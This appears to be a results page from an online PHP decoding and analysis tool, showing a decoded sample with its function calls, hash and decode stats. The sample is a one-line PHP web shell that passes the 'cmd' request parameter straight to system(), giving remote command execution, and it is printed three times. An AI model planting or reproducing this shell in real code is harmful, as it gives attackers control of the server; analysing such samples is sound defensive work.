Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<? if($_GET['cmd']) { system($_GET['cmd']); } ?>..

Decoded Output download

<? 
if($_GET['cmd']) { 
  system($_GET['cmd']); 
  } 
?>

Did this file decode correctly?

Original Code

<?
if($_GET['cmd']) {
  system($_GET['cmd']);
  }
?>

Function Calls

system 1

Variables

None

Stats

MD5 ebbe587ec30dc13e75957835f10f0d97
Eval Count 0
Decode Time 58 ms